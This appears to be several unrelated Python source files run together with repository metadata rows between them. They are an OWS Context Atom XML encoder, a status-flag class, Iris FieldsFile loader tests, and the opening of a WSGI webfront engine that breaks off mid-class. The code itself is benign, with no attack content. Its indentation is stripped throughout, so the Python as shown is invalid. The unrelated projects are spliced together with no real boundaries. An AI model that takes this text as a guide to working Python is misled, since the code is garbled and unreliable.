context_base_dict['properties'].update({"authors": authors})
# <georss:where>
val = feed_root.find(util.nspath_eval('georss:where', ns))
if val is not None:
if len(list(val)) > 0:
xmltxt = element_to_string(
list(val)[0], False)
# log.debug("geometry %s :: %s", xmltxt, val)
context_base_dict['properties'].update({"bbox": xmltxt.decode('utf-8')})
# <updated>2012-11-04T17:26:23Z</updated>
val = feed_root.find(util.nspath_eval('atom:updated', ns))
update_date = util.testXMLValue(val)
# log.debug("updated %s :: %s", update_date, val)
context_base_dict['properties'].update({"updated": update_date})
# <dc:date>2009-01-23T09:08:56.000Z/2009-01-23T09:14:08.000Z</dc:date>
val = feed_root.find(util.nspath_eval('dc:date', ns))
time_interval_of_interest = util.testXMLValue(val)
# log.debug("dc:date %s :: %s", time_interval_of_interest, val)
context_base_dict['properties'].update(
{"date": time_interval_of_interest})
# <rights>
val = feed_root.find(util.nspath_eval('atom:rights', ns))
rights = util.testXMLValue(val)
# log.debug("rights %s :: %s", rights, val)
context_base_dict['properties'].update({"rights": rights})
# <dc:publisher>
val = feed_root.find(util.nspath_eval('dc:publisher', ns))
publisher = util.testXMLValue(val)
# log.debug("dc:publisher %s :: %s", publisher, val)
context_base_dict['properties'].update({"publisher": publisher})
# <owc:display>
# <owc:pixelWidth>
val_display = feed_root.find(util.nspath_eval('owc:display', ns))
val_pixel_width = None if val_display is None \
else val_display.find(util.nspath_eval('owc:pixelWidth', ns))
val_pixel_height = None if val_display is None \
else val_display.find(util.nspath_eval('owc:pixelHeight', ns))
val_mm_per_pixel = None if val_display is None \
else val_display.find(util.nspath_eval('owc:mmPerPixel', ns))
pixel_width = util.testXMLValue(val_pixel_width)
pixel_height = util.testXMLValue(val_pixel_height)
mm_per_pixel = util.testXMLValue(val_mm_per_pixel)
owc_display = {
"pixelWidth": pixel_width,
"pixelHeight": pixel_height,
"mmPerPixel": mm_per_pixel
}
# log.debug("display %s :: %s", owc_display, val_display)
if not is_empty(owc_display):
context_base_dict['properties'].update({"display": owc_display})
# <generator uri="http://w.." version="1.0">MiraMon</generator>
val = feed_root.find(util.nspath_eval('atom:generator', ns))
name = util.testXMLValue(val)
version = util.testXMLAttribute(val, 'version')
uri = util.testXMLAttribute(val, 'uri')
owc_generator = {
"name": name,
"version": version,
"uri": uri
}
# log.debug("generator %s :: %s", owc_generator, val)
if not is_empty(owc_generator):
context_base_dict['properties'].update({"generator": owc_generator})
# <category term="maps" label="This file contains maps"/>
vals = feed_root.findall(util.nspath_eval('atom:category', ns))
categories = []
for val in vals:
term = util.testXMLAttribute(val, 'term')
scheme = util.testXMLAttribute(val, 'scheme')
label = util.testXMLAttribute(val, 'label')
category = {
"term": term,
"scheme": scheme,
"label": label
}
# log.debug("category %s :: %s", category, vals)
if not is_empty(category):
categories.append(category)
context_base_dict['properties'].update({"categories": categories})
# <entry> ...
entries = feed_root.findall(util.nspath_eval('atom:entry', ns))
resources = []
for entry in entries:
entry_dict = parse_entry(entry)
if entry_dict.get("id") is not None:
resources.append(entry_dict)
else:
log.warn("feature entry has no id, not allowed: skipping!")
context_base_dict.update({"features": resources})
return context_base_dict
def encode_atomxml(obj_d):
"""
encode instance of OwcContext dict into atom xml encoding,
because we can't do circular imports
:param obj_d: the dict from owscontext to dict
:return: b'atomxml'
"""
# try:
# xml_tree = axml_context(obj_d)
# tree = etree.ElementTree(xml_tree)
# return tree
# except TypeError as te:
# log.warn('problem encoding context to xml', te)
# raise te
# except AttributeError as ae:
# log.warn('problem encoding context to xml', ae)
# raise ae
# except ValueError as ve:
# log.warn('problem encoding context to xml', ve)
# raise ve
# except ParseError as pe:
# log.warn('problem encoding context to xml', pe)
# raise pe
xml_tree = axml_context(obj_d)
tree = etree.ElementTree(xml_tree)
return element_to_string(tree, encoding='utf-8', xml_declaration=False)
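# Usage sketch (illustrative, not part of the module API): given a context
# dict in the shape consumed below — e.g. one produced by an OwcContext-style
# to_dict() elsewhere in this package — the encoder returns the feed as bytes:
#   feed_bytes = encode_atomxml(context_dict)  # -> b'<feed ...>...</feed>'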
def axml_context(d):
"""
encodes base OwcContext as dict to atom xml tree
:param d:
:return:
"""
xml = etree.Element("feed", nsmap=ns)
etree.SubElement(xml, "id").text = d['id']
spec_reference = [axml_link(do) for do in
extract_p('properties.links.profiles', d, [])]
[xml.append(el) for el in spec_reference if el is not None]
area_of_interest = extract_p('bbox', d, None)
if area_of_interest is not None:
try:
gml = etree.fromstring(area_of_interest)
georss = etree.SubElement(xml, ns_elem("georss", "where"))
georss.append(gml)
except Exception as ex:
            log.warn('could not encode bbox into georss:where: %s', ex)
pass
context_metadata = [axml_link(do) for do in
extract_p('properties.links.via', d, [])]
[xml.append(el) for el in context_metadata if el is not None]
language = extract_p('properties.lang', d, None)
if language is not None:
xml.set(ns_elem("xml", "lang"), language)
title = extract_p('properties.title', d, None)
if title is not None:
etree.SubElement(xml, "title").text = title
# <subtitle type = "html"
subtitle = extract_p('properties.abstract', d, None)
if subtitle is not None:
etree.SubElement(xml, "subtitle").text = subtitle
update_date = extract_p('properties.updated', d, None)
if update_date is not None:
etree.SubElement(xml, "updated").text = update_date
authors = [axml_author(do) for do in extract_p('properties.authors', d, [])]
[xml.append(el) for el in authors if el is not None]
publisher = extract_p('properties.publisher', d, None)
if publisher is not None:
etree.SubElement(xml, ns_elem("dc", "publisher")).text = publisher
creator_application = axml_creator_app(extract_p('properties.generator', d, None))
if creator_application is not None and not is_empty(creator_application):
xml.append(creator_application)
creator_display = axml_display(extract_p('properties.display', d, None))
if creator_display is not None:
xml.append(creator_display)
rights = extract_p('properties.rights', d, None)
if rights is not None:
etree.SubElement(xml, "rights").text = rights
time_interval_of_interest = extract_p('properties.date', d, None)
if time_interval_of_interest is not None:
etree.SubElement(xml, ns_elem("dc", "date")).text = time_interval_of_interest
keywords = [axml_category(do) for do in
extract_p('properties.categories', d, [])]
[xml.append(el) for el in keywords if el is not None]
# here we generate single elements and attach them
resources = [axml_resource(do) for do in
extract_p('features', d, [])]
[xml.append(el) for el in resources if el is not None]
return xml
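# Minimal input sketch for axml_context (keys inferred from the extract_p
# calls above; 'id' is required, everything under 'properties' is optional):
#   d = {"id": "http://example.com/context/1",
#        "properties": {"title": "...", "lang": "en",
#                       "links": {"profiles": [], "via": []},
#                       "authors": [], "categories": []},
#        "features": []}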
def axml_resource(d):
"""
encodes an OwcResource as dict into atom xml tree
:param d:
:return:
"""
entry = etree.Element("entry", nsmap=ns)
etree.SubElement(entry, "id").text = d['id']
geospatial_extent = extract_p('geometry', d, None)
if geospatial_extent is not None:
try:
gml = etree.fromstring(geospatial_extent)
georss = etree.SubElement(entry, ns_elem("georss", "where"))
georss.append(gml)
except Exception as ex:
            log.warn('could not encode geometry into georss:where: %s', ex)
pass
title = d['properties']['title']
if title is not None:
etree.SubElement(entry, "title").text = title
subtitle = extract_p('properties.abstract', d, None)
# <content type = "text" >
if subtitle is not None:
etree.SubElement(entry, "content").text = subtitle
update_date = extract_p('properties.updated', d, None)
if update_date is not None:
etree.SubElement(entry, "updated").text = update_date
authors = [axml_author(do) for do in
extract_p('properties.authors', d, [])]
[entry.append(el) for el in authors if el is not None]
publisher = extract_p('properties.publisher', d, None)
    if publisher is not None:
etree.SubElement(entry, ns_elem("dc", "publisher")).text = publisher
rights = extract_p('properties.rights', d, None)
    if rights is not None:
etree.SubElement(entry, ns_elem("dc", "rights")).text = rights
temporal_extent = extract_p('properties.date', d, None)
if temporal_extent is not None:
etree.SubElement(entry, "date").text = temporal_extent
keywords = [axml_category(do) for do in
extract_p('properties.categories', d, [])]
[entry.append(el) for el in keywords if el is not None]
resource_metadata = [axml_link(do) for do in
extract_p('properties.links.via', d, [])]
[entry.append(el) for el in resource_metadata if el is not None]
content_description = [axml_content(do)
for do in extract_p('properties.links.alternates', d, [])]
[entry.append(el) for el in content_description if el is not None]
preview = [axml_link(do) for do in
extract_p('properties.links.preview', d, [])]
[entry.append(el) for el in preview if el is not None]
content_by_ref = [axml_link(do) for do in
extract_p('properties.links.data', d, [])]
[entry.append(el) for el in content_by_ref if el is not None]
offerings = [axml_offering(do) for do in
extract_p('properties.offerings', d, [])]
[entry.append(el) for el in offerings if el is not None]
# TODO no examples for active attribute
active = extract_p('properties.active', d, None)
if active is not None:
etree.SubElement(entry, "active").text = active
min_scale_denominator = try_float(extract_p(
'properties.minscaledenominator', d, None))
# <owc:minScaleDenominator>2500</owc:minScaleDenominator>
if min_scale_denominator is not None:
etree.SubElement(entry, ns_elem(
"owc", "minScaleDenominator")).text = str(min_scale_denominator)
max_scale_denominator = try_float(extract_p(
'properties.maxscaledenominator', d, None))
# <owc:maxScaleDenominator>25000</owc:maxScaleDenominator>
if max_scale_denominator is not None:
etree.SubElement(entry, ns_elem(
"owc", "maxScaleDenominator")).text = str(max_scale_denominator)
# TODO no examples for folder attribute
folder = extract_p('properties.folder', d, None)
if folder is not None:
etree.SubElement(entry, "folder").text = folder
# xml.append(entry)
return entry
def axml_creator_app(d):
# <generator uri="http://w.." version="1.0">MiraMon</generator>
if is_empty(d):
return None
else:
try:
creator_app = etree.Element("generator", nsmap=ns)
title = extract_p('title', d, None)
if title is not None:
creator_app.text = title
uri = extract_p('uri', d, None)
if uri is not None:
creator_app.set("uri", uri)
version = extract_p('version', d, None)
if version is not None:
creator_app.set("version", version)
return creator_app
except Exception as ex:
            log.warn('could not encode creator_app: %s', ex)
return None
def axml_display(d):
# <owc:display>
# <owc:pixelWidth>
if is_empty(d):
return None
else:
try:
creator_display = etree.Element(ns_elem("owc", "display"), nsmap=ns)
pixel_width = try_int(extract_p('pixelWidth', d, None))
if pixel_width is not None:
etree.SubElement(creator_display, ns_elem(
"owc", "pixelWidth")).text = str(pixel_width)
pixel_height = try_int(extract_p('pixelHeight', d, None))
if pixel_height is not None:
etree.SubElement(creator_display, ns_elem(
"owc", "pixelHeight")).text = str(pixel_height)
mm_per_pixel = try_float(extract_p('mmPerPixel', d, None))
if mm_per_pixel is not None:
etree.SubElement(creator_display, ns_elem(
"owc", "mmPerPixel")).text = str(mm_per_pixel)
return creator_display
except Exception as ex:
            log.warn('could not encode creator_display: %s', ex)
return None
def axml_link(d):
# < link rel = "via" type = "application/xml" href = "..." title = "..."
if is_empty(d):
return None
else:
try:
link = etree.Element("link", nsmap=ns)
href = extract_p('href', d, None)
if href is not None:
link.set("href", href)
rel = extract_p('rel', d, None)
if rel is not None:
link.set("rel", rel)
mimetype = extract_p('type', d, None)
if mimetype is not None:
link.set("type", mimetype)
lang = extract_p('lang', d, None)
if lang is not None:
link.set("lang", lang)
title = extract_p('title', d, None)
if title is not None:
link.set("title", title)
length = try_int(extract_p('length', d, None))
if length is not None:
link.set("length", str(length))
return link
except Exception as ex:
            log.warn('could not encode link: %s', ex)
return None
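# Sketch of the link dict shape axml_link expects (mirrors the dicts built by
# the decoder above; all keys are optional and empty dicts yield None):
#   {"href": "http://...", "rel": "profile", "type": "application/xml",
#    "lang": "en", "title": "...", "length": 1234}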
def axml_category(d):
# <category term="maps" label="This file contains maps"/>
if is_empty(d):
return None
else:
try:
category = etree.Element("category", nsmap=ns)
term = extract_p('term', d, None)
if term is not None:
category.set("term", term)
scheme = extract_p('scheme', d, None)
if scheme is not None:
category.set("scheme", scheme)
label = extract_p('label', d, None)
if label is not None:
category.set("label", label)
return category
except Exception as ex:
            log.warn('could not encode category: %s', ex)
return None
def axml_author(d):
# <author> ..
# <name>
# <email>
if is_empty(d):
return None
else:
try:
author = etree.Element("author", nsmap=ns)
name = extract_p('name', d, None)
if name is not None:
etree.SubElement(author, "name").text = name
email = extract_p('email', d, None)
if email is not None:
etree.SubElement(author, "email").text = email
uri = extract_p('uri', d, None)
if uri is not None:
etree.SubElement(author, "uri").text = uri
return author
except Exception as ex:
            log.warn('could not encode author: %s', ex)
return None
def axml_offering(d):
# <owc:offering code="http://www.opengis.net/spec/owc-at...">
# <owc:offering code="http://www.opengis.net/spec....l">
# <owc:content type="application/gml+xml">
if is_empty(d):
return None
else:
try:
offering_code = extract_p('code', d, None)
offering = etree.Element(ns_elem("owc", "offering"), attrib={"code": offering_code}, nsmap=ns)
# use axml_operation here
operations = [axml_operation(do) for do in
extract_p('operations', d, [])]
[offering.append(el) for el in operations if el is not None]
# use axml_content here
contents = [axml_content(do) for do in
extract_p('contents', d, [])]
[offering.append(el) for el in contents if el is not None]
# use axml_styeset here
styles = [axml_styleset(do) for do in
extract_p('styles', d, [])]
[offering.append(el) for el in styles if el is not None]
return offering
except Exception as ex:
            log.warn('could not encode offering: %s', ex)
return None
def axml_operation(d):
# <owc:operation code="GetCapabilities" method="GET"
# type="applica..." href="..."
# <owc:request type="application/xml"> ..
# etree.SubElement(entry, ns_elem("owc", "offering"), name="blah").text = "some value1"
if is_empty(d):
return None
else:
try:
operation = etree.Element(ns_elem("owc", "operation"), nsmap=ns)
operations_code = extract_p('code', d, None)
if operations_code is not None:
operation.set("code", operations_code)
http_method = extract_p('method', d, None)
if http_method is not None:
operation.set("method", http_method)
mimetype = extract_p('type', d, None)
if mimetype is not None:
operation.set("type", mimetype)
request_url = extract_p('href', d, None)
if request_url is not None:
operation.set("href", request_url)
# use axml_content here
request = extract_p('request', d, None)
request_enc = None if request is None else axml_content(request)
if request_enc is not None:
operation.append(request_enc)
# use axml_content here
result = extract_p('result', d, None)
result_enc = None if result is None else axml_content(result)
if result_enc is not None:
operation.append(result_enc)
return operation
except Exception as ex:
            log.warn('could not encode operation: %s', ex)
return None
def axml_styleset(d):
# <owc:styleSet>
# <owc:name>raster</owc:name>
# <owc:title>Default Raster</owc:title>
# <owc:abstract>A sample style that draws a </owc:abstract>
# <owc:legendURL href="h...." type="image/png"/>
# </owc:styleSet>
if is_empty(d):
return None
else:
try:
styleset = etree.Element(ns_elem("owc", "styleSet"), nsmap=ns)
name = extract_p('name', d, None)
if name is not None:
etree.SubElement(styleset, ns_elem("owc", "name")).text = name
title = extract_p('title', d, None)
if title is not None:
etree.SubElement(styleset, ns_elem("owc", "title")).text = title
subtitle = extract_p('abstract', d, None)
if subtitle is not None:
etree.SubElement(styleset, ns_elem("owc", "abstract")).text = subtitle
is_default = extract_p('default', d, None)
# TODO no example for default setting on style set
if is_default is not None:
etree.SubElement(styleset, ns_elem("owc", "default")).text = is_default
legend_url = extract_p('legendURL', d, None)
if legend_url is not None:
etree.SubElement(styleset, ns_elem("owc", "legendURL")).text = legend_url
# TODO no example for content on style set
content = extract_p('content', d, None)
content_enc = None if content is None else axml_content(content)
if content_enc is not None:
styleset.append(content_enc)
return styleset
except Exception as ex:
            log.warn('could not encode styleset: %s', ex)
return None
def axml_content(d):
"""
OwcContent dict to Atom XML
:param d:
:return:
"""
# <owc:content type="image/tiff" href=".."
if is_empty(d):
return None
else:
try:
content_elem = etree.Element(ns_elem("owc", "content"), nsmap=ns)
mimetype = extract_p('type', d, None)
if mimetype is not None:
content_elem.set("type", mimetype)
url = extract_p('url', d, None)
if url is not None:
content_elem.set("href", url)
title = extract_p('title', d, None)
if title is not None:
content_elem.set("title", title)
content = extract_p('content', d, None)
            if content is not None:
content_elem.text = content
return content_elem
except Exception as ex:
            log.warn('could not encode content: %s', ex)
return None
| bsd-3-clause | 4,384,036,189,799,634,400 | 35.935547 | 106 | 0.568188 | false | 3.644791 | true | false | false |
hep-cce/hpc-edge-service | balsam/job_sources/StatusMessage.py | 1 | 1185 | import logging
logger = logging.getLogger(__name__)
class StatusMessage:
NO_MESSAGE = 0x0
SUCCEEDED = 0x1 << 0
SUBMIT_DISABLED = 0x1 << 1
FAILED = 0x1 << 2
INVALID_EXE = 0x1 << 3
message_list = [
NO_MESSAGE,
SUCCEEDED,
SUBMIT_DISABLED,
FAILED,
INVALID_EXE,
]
message_text = {
NO_MESSAGE:'no message',
SUCCEEDED:'succeeded',
SUBMIT_DISABLED:'submission disabled',
FAILED:'failed',
INVALID_EXE:'invalid executable',
}
def __init__(self):
self.message = StatusMessage.NO_MESSAGE
def __str__(self):
out = []
for message in StatusMessage.message_list:
if message & self.message:
out.append(StatusMessage.message_text[message])
return str(out)
def contains(self,flag):
if flag in StatusMessage.message_list:
if self.message & flag:
return True
else:
logger.warning('Invalid Flag passed')
return False
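# Usage sketch (illustrative):
#   status = StatusMessage()
#   status.message |= StatusMessage.FAILED | StatusMessage.INVALID_EXE
#   status.contains(StatusMessage.FAILED)  # -> True
#   str(status)  # -> "['failed', 'invalid executable']"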
| bsd-3-clause | 7,310,423,936,941,458,000 | 25.931818 | 59 | 0.497046 | false | 4.557692 | false | false | false |
kwilliams-mo/iris | lib/iris/tests/test_ff.py | 1 | 13197 | # (C) British Crown Copyright 2010 - 2013, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
Test the Fieldsfile file loading plugin and FFHeader.
"""
# import iris tests first so that some things can be initialised before
# importing anything else
import iris.tests as tests
import collections
import warnings
import mock
import numpy as np
import iris
import iris.fileformats.ff as ff
import iris.fileformats.pp as pp
_MockField = collections.namedtuple('_MockField',
'lbext,lblrec,lbnrec,lbpack,lbuser')
_MockLbpack = collections.namedtuple('_MockLbpack', 'n1')
# PP-field: LBPACK N1 values.
_UNPACKED = 0
_WGDOS = 1
_CRAY = 2
_GRIB = 3 # Not implemented.
_RLE = 4 # Not supported, deprecated FF format.
# PP-field: LBUSER(1) values.
_REAL = 1
_INTEGER = 2
_LOGICAL = 3 # Not implemented.
class TestFF_HEADER(tests.IrisTest):
def test_initialisation(self):
self.assertEqual(ff.FF_HEADER[0], ('data_set_format_version', (0,)))
self.assertEqual(ff.FF_HEADER[17], ('integer_constants', (99, 100)))
def test_size(self):
self.assertEqual(len(ff.FF_HEADER), 31)
@iris.tests.skip_data
class TestFFHeader(tests.IrisTest):
def setUp(self):
self.filename = tests.get_data_path(('FF', 'n48_multi_field'))
self.ff_header = ff.FFHeader(self.filename)
self.valid_headers = (
'integer_constants', 'real_constants', 'level_dependent_constants',
'lookup_table', 'data'
)
self.invalid_headers = (
'row_dependent_constants', 'column_dependent_constants',
'fields_of_constants', 'extra_constants', 'temp_historyfile',
'compressed_field_index1', 'compressed_field_index2',
'compressed_field_index3'
)
def test_constructor(self):
"""Test FieldsFile header attribute lookup."""
self.assertEqual(self.ff_header.data_set_format_version, 20)
self.assertEqual(self.ff_header.sub_model, 1)
self.assertEqual(self.ff_header.vert_coord_type, 5)
self.assertEqual(self.ff_header.horiz_grid_type, 0)
self.assertEqual(self.ff_header.dataset_type, 3)
self.assertEqual(self.ff_header.run_identifier, 0)
self.assertEqual(self.ff_header.experiment_number, -32768)
self.assertEqual(self.ff_header.calendar, 1)
self.assertEqual(self.ff_header.grid_staggering, 3)
self.assertEqual(self.ff_header.time_type, -32768)
self.assertEqual(self.ff_header.projection_number, -32768)
self.assertEqual(self.ff_header.model_version, 802)
self.assertEqual(self.ff_header.obs_file_type, -32768)
self.assertEqual(self.ff_header.last_fieldop_type, -32768)
self.assertEqual(self.ff_header.first_validity_time,
(2011, 7, 10, 18, 0, 0, 191))
self.assertEqual(self.ff_header.last_validity_time,
(2011, 7, 10, 21, 0, 0, 191))
self.assertEqual(self.ff_header.misc_validity_time,
(2012, 4, 30, 18, 12, 13, -32768))
self.assertEqual(self.ff_header.integer_constants.shape, (46, ))
self.assertEqual(self.ff_header.real_constants.shape, (38, ))
self.assertEqual(self.ff_header.level_dependent_constants.shape,
(71, 8))
self.assertIsNone(self.ff_header.row_dependent_constants)
self.assertIsNone(self.ff_header.column_dependent_constants)
self.assertIsNone(self.ff_header.fields_of_constants)
self.assertIsNone(self.ff_header.extra_constants)
self.assertIsNone(self.ff_header.temp_historyfile)
self.assertIsNone(self.ff_header.compressed_field_index1)
self.assertIsNone(self.ff_header.compressed_field_index2)
self.assertIsNone(self.ff_header.compressed_field_index3)
self.assertEqual(self.ff_header.lookup_table, (909, 64, 5))
self.assertEqual(self.ff_header.total_prognostic_fields, 3119)
self.assertEqual(self.ff_header.data, (2049, 2961, -32768))
def test_str(self):
self.assertString(str(self.ff_header), ('FF', 'ffheader.txt'))
def test_repr(self):
target = "FFHeader('" + self.filename + "')"
self.assertEqual(repr(self.ff_header), target)
def test_shape(self):
self.assertEqual(self.ff_header.shape('data'), (2961, -32768))
@iris.tests.skip_data
class TestFF2PP2Cube(tests.IrisTest):
def setUp(self):
self.filename = tests.get_data_path(('FF', 'n48_multi_field'))
def test_unit_pass_0(self):
"""Test FieldsFile to PPFields cube load."""
cube_by_name = collections.defaultdict(int)
cubes = iris.load(self.filename)
while cubes:
cube = cubes.pop(0)
standard_name = cube.standard_name
cube_by_name[standard_name] += 1
filename = '{}_{}.cml'.format(standard_name,
cube_by_name[standard_name])
self.assertCML(cube, ('FF', filename))
@iris.tests.skip_data
class TestFFieee32(tests.IrisTest):
def test_iris_loading(self):
ff32_fname = tests.get_data_path(('FF', 'n48_multi_field.ieee32'))
ff64_fname = tests.get_data_path(('FF', 'n48_multi_field'))
ff32_cubes = iris.load(ff32_fname)
ff64_cubes = iris.load(ff64_fname)
for ff32, ff64 in zip(ff32_cubes, ff64_cubes):
# load the data
_, _ = ff32.data, ff64.data
self.assertEqual(ff32, ff64)
@iris.tests.skip_data
class TestFFVariableResolutionGrid(tests.IrisTest):
def setUp(self):
self.filename = tests.get_data_path(('FF', 'n48_multi_field'))
self.ff2pp = ff.FF2PP(self.filename)
self.ff_header = self.ff2pp._ff_header
data_shape = (73, 96)
delta = np.sin(np.linspace(0, np.pi * 5, data_shape[1])) * 5
lons = np.linspace(0, 180, data_shape[1]) + delta
lons = np.vstack([lons[:-1], lons[:-1] + 0.5 * np.diff(lons)]).T
lons = np.reshape(lons, lons.shape, order='F')
delta = np.sin(np.linspace(0, np.pi * 5, data_shape[0])) * 5
lats = np.linspace(-90, 90, data_shape[0]) + delta
lats = np.vstack([lats[:-1], lats[:-1] + 0.5 * np.diff(lats)]).T
lats = np.reshape(lats, lats.shape, order='F')
self.ff_header.column_dependent_constants = lons
self.ff_header.row_dependent_constants = lats
self.U_grid_x = lons[:, 1]
self.V_grid_y = lats[:-1, 1]
self.P_grid_x = lons[:, 0]
self.P_grid_y = lats[:, 0]
self.orig_make_pp_field = pp.make_pp_field
def new_make_pp_field(header_values):
field = self.orig_make_pp_field(header_values)
field.stash = self.ff2pp._custom_stash
field.bdx = field.bdy = field.bmdi
return field
# Replace the pp module function with this new function;
# this gets called in PP2FF.
pp.make_pp_field = new_make_pp_field
def tearDown(self):
pp.make_pp_field = self.orig_make_pp_field
def _check_stash(self, stash, x_coord, y_coord):
self.ff2pp._custom_stash = stash
field = next(iter(self.ff2pp))
self.assertArrayEqual(x_coord, field.x, ('x_coord was incorrect for '
'stash {}'.format(stash)))
self.assertArrayEqual(y_coord, field.y, ('y_coord was incorrect for '
'stash {}'.format(stash)))
def test_p(self):
self._check_stash('m01s00i001', self.P_grid_x, self.P_grid_y)
def test_u(self):
self._check_stash('m01s00i002', self.U_grid_x, self.P_grid_y)
def test_v(self):
self._check_stash('m01s00i003', self.P_grid_x, self.V_grid_y)
def test_unhandled_grid_type(self):
with mock.patch('warnings.warn') as warn_fn:
self._check_stash('m01s00i005', self.P_grid_x, self.P_grid_y)
self.assertIn("Assuming the data is on a P grid.",
warn_fn.call_args[0][0])
class TestFFPayload(tests.IrisTest):
def _test_payload(self, mock_field, expected_depth, expected_type):
with mock.patch('iris.fileformats.ff.FFHeader') as mock_header:
mock_header.return_value = None
ff2pp = ff.FF2PP('Not real')
data_depth, data_type = ff2pp._payload(mock_field)
self.assertEqual(data_depth, expected_depth)
self.assertEqual(data_type, expected_type)
def test_payload_unpacked_real(self):
mock_field = _MockField(lbext=0, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_REAL])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_REAL].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 800, expected_type)
def test_payload_unpacked_real_ext(self):
mock_field = _MockField(lbext=50, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_REAL])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_REAL].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 400, expected_type)
def test_payload_unpacked_integer(self):
mock_field = _MockField(lbext=0, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_INTEGER])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_INTEGER].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 1600, expected_type)
def test_payload_unpacked_integer_ext(self):
mock_field = _MockField(lbext=100, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_UNPACKED),
lbuser=[_INTEGER])
expected_type = ff._LBUSER_DTYPE_LOOKUP[_INTEGER].format(word_depth=8)
expected_type = np.dtype(expected_type)
self._test_payload(mock_field, 800, expected_type)
def test_payload_wgdos_real(self):
mock_field = _MockField(lbext=0, lblrec=-1, lbnrec=100,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_REAL])
self._test_payload(mock_field, 796, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_wgdos_real_ext(self):
mock_field = _MockField(lbext=50, lblrec=-1, lbnrec=100,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_REAL])
self._test_payload(mock_field, 796, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_wgdos_integer(self):
mock_field = _MockField(lbext=0, lblrec=-1, lbnrec=200,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_INTEGER])
self._test_payload(mock_field, 1596, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
def test_payload_wgdos_integer_ext(self):
mock_field = _MockField(lbext=100, lblrec=-1, lbnrec=200,
lbpack=_MockLbpack(_WGDOS),
lbuser=[_INTEGER])
self._test_payload(mock_field, 1596, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
def test_payload_cray_real(self):
mock_field = _MockField(lbext=0, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_REAL])
self._test_payload(mock_field, 400, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_cray_real_ext(self):
mock_field = _MockField(lbext=50, lblrec=100, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_REAL])
self._test_payload(mock_field, 200, pp.LBUSER_DTYPE_LOOKUP[_REAL])
def test_payload_cray_integer(self):
mock_field = _MockField(lbext=0, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_INTEGER])
self._test_payload(mock_field, 800, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
def test_payload_cray_integer_ext(self):
mock_field = _MockField(lbext=100, lblrec=200, lbnrec=-1,
lbpack=_MockLbpack(_CRAY),
lbuser=[_INTEGER])
self._test_payload(mock_field, 400, pp.LBUSER_DTYPE_LOOKUP[_INTEGER])
if __name__ == '__main__':
tests.main()
| gpl-3.0 | 346,667,395,340,066,240 | 40.369906 | 79 | 0.600364 | false | 3.379513 | true | false | false |
eavatar/ava-srv | src/eavatar.ava/ava/core/webfront.py | 1 | 3774 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import logging
import gevent
import bottle
from gevent import pywsgi
from ava.runtime import config
from ava.runtime import environ
logger = logging.getLogger(__name__)
_CONF_SECTION = 'webfront'
class ApplicationDispatcher(object):
"""Allows one to mount middlewares or applications in a WSGI application.
"""
def __init__(self, app, mounts=None):
self.app = app
self.mounts = mounts or {}
def __call__(self, environ, start_response):
script = environ.get(b'PATH_INFO', b'')
path_info = ''
while b'/' in script:
if script in self.mounts:
app = self.mounts[script]
break
script, last_item = script.rsplit(b'/', 1)
path_info = b'/%s%s' % (last_item, path_info)
else:
app = self.mounts.get(script, self.app)
original_script_name = environ.get(b'SCRIPT_NAME', b'')
environ[b'SCRIPT_NAME'] = original_script_name + script
environ[b'PATH_INFO'] = path_info
return app(environ, start_response)
def attach_app(self, path, app):
self.mounts[path] = app
def detach_app(self, path):
app = self.mounts.get(path)
if app is not None:
del self.mounts[path]
# the global web application
dispatcher = ApplicationDispatcher(bottle.app())
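# Usage sketch (illustrative; 'api_app' is a hypothetical WSGI callable):
# mounting routes requests under /api to api_app with SCRIPT_NAME/PATH_INFO
# rewritten, while all other paths fall through to the default bottle app.
#   dispatcher.attach_app(b'/api', api_app)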
class WebfrontEngine(object):
"""
The client-facing web interface.
"""
def __init__(self):
logger.debug("Initializing webfront engine...")
self._http_listener = None
self._https_listener = None
self.listen_port = 5000
self.listen_addr = '127.0.0.1'
        self.secure_listen_port = 0  # 0 means not binding
self.local_base_url = "http://127.0.0.1:%d/" % (self.listen_port,)
def start(self, ctx=None):
logger.debug("Starting webfront engine...")
self.listen_port = config.agent().getint(_CONF_SECTION, 'listen_port')
self.listen_addr = config.agent().get(_CONF_SECTION, 'listen_addr')
self.secure_listen_port = config.agent().getint(_CONF_SECTION, 'secure_listen_port')
self.local_base_url = "http://127.0.0.1:%d/" % (self.listen_port,)
logger.debug("Local base URL:%s", self.local_base_url)
if self.listen_port != 0:
ctx.add_child_greenlet(gevent.spawn(self._run_http))
if self.secure_listen_port != 0:
ctx.add_child_greenlet(gevent.spawn(self._run_https))
logger.debug("Webfront engine started.")
def stop(self, ctx=None):
